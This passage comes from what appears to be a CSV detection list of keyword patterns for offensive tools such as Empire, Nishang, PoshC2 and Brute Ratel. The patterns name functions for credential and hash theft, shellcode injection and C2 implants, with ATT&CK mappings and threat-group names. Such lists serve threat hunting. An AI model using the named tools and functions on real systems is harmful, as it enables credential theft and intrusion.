Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketRPCRequest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketSMB*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PassHashes*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-PassHints*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*get-passnotexp*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-password-policy.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Get-PEBasicInfo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PEHeader.ps1*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*getPositionImplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" 
+"*getprivs.bin*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*getprivs.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*get-process *amsi.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-RBCD-Threaded*","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - 
TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","1","N/A","N/A","2","115","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z" +"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration 
testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-RegistryAutoLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*Get-RegistryAutoLogon*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*GetRektBoy724/SharpUnhooker*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" +"*Get-RemoteCachedCredential*","offensive_tool_keyword","AD exploitation cheat sheet","Get cached credentials (if any)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-RemoteCachedCredential*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*Get-RemoteDesktopUserSessionList*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-RemoteDesktopUserSessionList.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - 
TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-RemoteLocalAccountHash*","offensive_tool_keyword","AD exploitation cheat sheet","Get local account hashes","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-RemoteLocalAccountHash*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*Get-RemoteMachineAccountHash*","offensive_tool_keyword","AD exploitation cheat sheet","Get machine account hash for silver ticket attack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*getremoteprocesslisting*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-RickAstley*","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-RickAstley.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RickAstley.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*gets4uticket.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*Get-SccmCacheFolder*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*get-screenshot*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers 
with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-screenshotallwindows*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-SecurityPackages.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ShadowCopies*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*GetShellcode(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. 
The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*Get-SitelistFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 